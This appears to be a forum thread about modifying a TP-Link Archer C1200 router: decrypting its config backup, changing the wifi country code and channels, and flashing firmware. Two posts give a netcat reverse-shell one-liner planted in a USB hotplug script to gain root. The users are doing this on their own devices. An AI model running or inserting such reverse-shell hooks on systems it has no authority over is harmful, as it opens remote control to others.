Build for TP-Link Archer C1200-AC1200

I'm sorry is not like that. The scripts will load the config from the files in /etc/ where uci stores the data.

You just need to edit /etc/config/wireless (if you downloaded the GPL source just take a look at ./IPlatform/platform/ibase/luci/src/contrib/uci/hostfiles/etc/config/wireless for an example).

To do so, simply add the values in XML format in your config file.

Now, I agree that then you potentially loose the ability to manipulate this from the web interface. It depends what you want to do.

I see....pardon my ignorance....still new in learning these stuff. :zipper_mouth_face:

Anyway, I tried to edit config.bin and add channel 165 (currently using official EU firmware), however I am sad to say it didn't work. It rebooted and automatically select channel 48. (Android Wifi Analyser also indicates channel 48 being used)

Hmm....turning txbf on for 2.4ghz in config.bin doesn't seem to do anything (no dbm improvement when streaming video to my phone and laptop) unlike 5ghz (GUI available for 5ghz only)

As far as I know the hw has not bf capabilities on the 2,4 Ghz spectrum. Regarding the channel there are other config options and files at play and you can use various tricks to set it, but you'd need to be creative about it.

I suggest you study how the various files work to bring up the wireless interface (e.g. tplink_brcm.sh) in the original firmware. I can't give you a pre-made solution because I don't have one. :slight_smile:

Good luck!

When I try to decrypt the config.bin I renamed from backup-Archer C1200-2018-01-03.bin, I got the error below, am I doing anything wrong? Running Ubuntu 16.04 on VMWare with my own compiled openssl including zlib from this guide:

Running the command:

openssl zlib -d -in config.bin | openssl aes-256-cbc -d -k ‘Archer C1200’ -out config.tar

I get the error below:

892:error:29065064:lib(41):BIO_ZLIB_READ:zlib inflate error:c_zlib.c:548:zlib error:data error
error reading input file

.....Did you configure your openssl with.....

./config --prefix=/usr
--openssldir=/etc/ssl
--libdir=lib
shared
zlib-dynamic &&
sudo make install

....after you ....

$ ./config zlib
$ make
$ sudo make install

...?

Note: beware of the apostrophe symbol for 'Archer C1200' if you copy paste the command from this forum. For some unknown reason, the apostrophe changes to another symbol after one copied/pastes from this forum. Better retype the apostrophe symbol.

Thanks for your reply.

I have tried running the command below:

$ ./config --prefix=/usr --openssldir=/etc/ssl --libdir=lib shared zlib-dynamic && sudo make install

after running

$ ./config zlib
$ make
$ sudo make install

but I still get the same error. I also tried reversing the commands as suggested by another user above and I got an error saying bad decrypt and also the data error as before. Any ideas on what should I check next?

EDIT: I got it working on Windows by running the AES decryption first and output the file, and then using zlib to decompress the output file again. Thanks for helping out anyway.

EDIT 2: Strange enough, I wasn't able to get the file to be verified from TP-Link's web GUI even though I ran the same commands as you to encrypt the file back.

openssl zlib -in config.tar | openssl aes-256-cbc -out config.bin -k ‘Archer C1200’

EDIT 3: I got the bad encrypt error again on Ubuntu or Debian but not on Windows. Perhaps this is related to the issue that I'm unable to encrypt the file back?

I am using virtualbox (ubuntu gotten from ^osboxes.org^, login pass is ^osboxes.org^).

First, I open the Terminal,

sudo apt-get install gcc make build-essential

wget https**://zlib.net/zlib-1.2.11.tar.gz (err, cause I am new user, I can't post more than 2 links, I assume you know how to remove the ** )
tar xvzf zlib-1.2.11.tar.gz
cd zlib-1.2.11
./configure
sudo make install

cd ..
wget https://www.openssl.org/source/openssl-1.1.1-pre2.tar.gz
tar xvzf openssl-1.1.1-pre2.tar.gz
cd openssl-1.1.1-pre2

./config --prefix=/usr
--openssldir=/etc/ssl
--libdir=lib
shared
zlib-dynamic &&
make

sudo make install

Next, time to uncompress/decrypt:

openssl aes-256-cbc -d -in config.bin -k 'Archer C1200' | openssl zlib -d -out config.tar
Whatever you do, don't copy paste from this forum. The apostrophe symbol issue is pain in ass


See the issue? The first one has wrong apostrophe (if one copy-paste from the forum). The second bottom line has correct apostrophe.

tar xf config.tar

Well....edit the stuff extracted from config.tar....edit ori-backup-user-config.bin to your liking.

Then open up the config.tar , delete the ori-backup-user-config.bin, drag and drop your edited ori-backup-user-config.bin into config.tar

Time to repack/reencrypt again

openssl zlib -in config.tar | openssl aes-256-cbc -out config.bin -k 'Archer C1200'

Careful on the apostrophe

1 Like

Thanks for your guide, finally managed to get my SSH working but I used OpenSSL 1.0.2m instead of 1.1.1-pre2, guess the engineers encrypted V1 with a different version instead.

BTW, do u happen to be a Malaysian too by any chance?

Yes. But that is irrelevant.
Even with ssh access, there is nothing much we can do without root access.

root access can be achieved by getting a service or event to execute a shell and pipe it over netcat to a computer.

I used /etc/hotplug.d/usb/10-usb and then plugged in a usb stick to force the event.

on the computer I executed:

nc -l -p 12345

in the 10-usb file I added:

mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.1 12345 > /tmp/f

I'm going to look into persisting changes on boot by using the overlay

@quaqo probably has a better way.

3 Likes

In conjunction with root access method given by @drush , I am able to determine wifi capability without going through all the way of backup,decrypt,untar,edit,encrypt,restore steps.

Apparently, different country code has different 5ghz channel available. When I changed the code to MY and edited channel to 120, 136, 165, it ended up in failure because Broadcom wifi firmware country code does not allow such channel to be valid.

It turns out Malaysia country code in broadcom firmware only contains channel 36, 38, 40, 44, 48, 149, 153, 157 and 161.

Strangely enough, if Bahamas BS code is specified, the router will ended up not being able to restore the edited.bin settings

edit: anyone wanna prepare a list of country code available with 5ghz channel from this c1200 wifi firmware? I wonder which country code has the most 5ghz wifi channel......

mine has only 36, 38, 40, 44, 48 eu firmware.. would be great if there was a way to use other channels.

Please do the following on CABLE, not wireless

  1. Please make a backup of config.bin (unmolested, clean and virgin)

Must use root mode. Follow @drush guide.
As admin mode ssh admin@192.168.x.x in ssh access, edit /etc/hotplug.d/usb/10-usb via VIM (vim keyboard shortcut a pain in ass) to add mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.x.x 12345 > /tmp/f at the bottom and save it. Don't ask me how to use VIM, I have hard time myself.
Change 192.168.x.x to the IP address of your linux system

In my case, I decided to use Rufus + Ubuntu live cd.

Using sudo -i to enter root mode at ubuntu before running nc -l -p 12345
Plug in a usb pendrive to the router and voila, ubuntu terminal will get connected to the router.

uci show wireless
uci set wireless.eth2.country=MY
uci set wireless.eth3.country=MY
uci set wireless.eth2.channel=auto --->for a good reason, you can change it later.
uci commit wireless; wifi ----> this will reload the wifi interface.

EDIT: I forgot the mention the most important part. Need to restart uhttpd server before the following step of uploading a modified config.bin:
/etc/init.d/uhttpd restart
***Otherwise, TP-Link webui will reject the modified config.bin in the following step below.

Now, the pain in ass issue, remember the previous ori-backup-user-config.bin from few posts ago? Yeah.....one needs to edit that as well ;
<country>MY</country> ---> for both 2.4ghz and 5ghz
Set <channel>auto</channel> for 5ghz
Re-tar,recompress,re-encrypt.

Open up tplink 192.168.0.1, and restore the edited config.bin

voila, EU firmware get persisted MY channel 36, 38, 40, 44, 48, 149, 153, 157 and 161

Otherwise, if one simply edits config.bin's ori-backup-user-config.bin country code and 'restore' it, it will not get 'activated' after 'restore'. The uci commit step must be done first.

1 Like

Can anyone help me to find out what is written into config.bin when webui is sending {"value": "AR", "name": "ARGENTINA", "no_autodetect": true}
This "no_autodetect": true probably disables DFS or TPC or both.

Example, TM Malaysia C1200 firmware can support channel 36, 40, 44, 48, 100, 120, 161, 165 using BS country code.

However, in EU C1200 firmware, simply changing to BS country code will display 36, 40, 44, 48 only. Directly changing to MY country code will display 36, 38, 40, 44, 48, 149, 153, 157 and 161. So, I suspect my EU firmware config.bin is missing critical parameter in enabling missing 5ghz band 2A and 2C

Another strange issue, changing the code to TW causes 2.4ghz wifi to stop functioning (in the config.bin, channel 1 is selected for 2.4ghz interface). TW 5ghz will automatically pick one of band 2A channel and function normally.

Hi, I have the v2 (EU) of the Archer C1200. It appears to be rather simmilar to v1, according to wikidev it uses the BCM47189 instead of the BCM47189B0.

I have access to the serial console and would like to try how far I get with the build for v1.
But before I do that, what's the recovery procedure?

Can I flash back the factory image using CFE?

I've tried TFTP loading the initramfs on v2, but it would not boot.

CFE> boot -tftp 192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx Options:(null)
Loading: ........... 262144 bytes read
Entry at 0x20000000
Closing network.
Starting program at 0x20000000

It also gets stuck there if I try build_dir/target-arm_cortex-a9_musl_eabi/linux-bcm53xx/vmlinux-initramfs

CFE> boot -tftp 192.168.9.133:vmlinux-initramfs
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:vmlinux-initramfs Options:(null)
Loading: ........... 262144 bytes read
Entry at 0x20000000
Closing network.
Starting program at 0x20000000

I'm wondering why it's only reading 256kB when the files are in fact much larger.

Never managed to figure out boot command, seems broken to me/looking in bad direction.
I'm testing my fw by using: flash -noheader ipaddr:filename flash0.trx
that flashes the file without checking.
For going back to stock, just restart modem and spam reboot button until firmware recovery starts, then upload original firmware

What is flash0.trx? Is it a renamed file generated by the OpenWRT image builder?

That's where firmware partition starts

Ah, didn't see the ipaddr:filename in front of it.

I guess you are flashing the squashfs.bin file?

btw, I managed to get the boot / load command to load the entire file by also specifying the address:

CFE> load -addr=0x20000000 -max=3428352 -tftp 192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx
Loader:raw Filesys:tftp Dev:eth0 File:192.168.9.133:openwrt-bcm53xx-tplink-archer-c1200-v1-initramfs.trx 
Options:(null)
Loading: ........... 3428352 bytes read
Entry at 0x20000000
*** command status = 0

However, it would still not boot.

CFE> go
Closing network.
Starting program at 0x20000000

edit: Thinking about it, it makes sense as the initramfs will probably load data to that region of memory too, and in doing so overwrite itself.

So I've flashed your archer-c1200-v1-initramfs.trx to the flash of my v2 router and it boots!
dmesg

Ethernet is working, USB is working but for WiFi only scanning the 2.4GHz band works, neither sta nor ap mode result in a link, but you had the same problem. Also the polarity of the LEDs appears to be reversed. (Writing 0 to brightness turns them on, 255 turns them off)

I've also successfully flashed the factory firmware using the CFE web based recovery. (The http server will only listen on 192.168.0.1, so I couldn't access it after changing the ip with ifconfig)
dmesg of the factory firmware

1 Like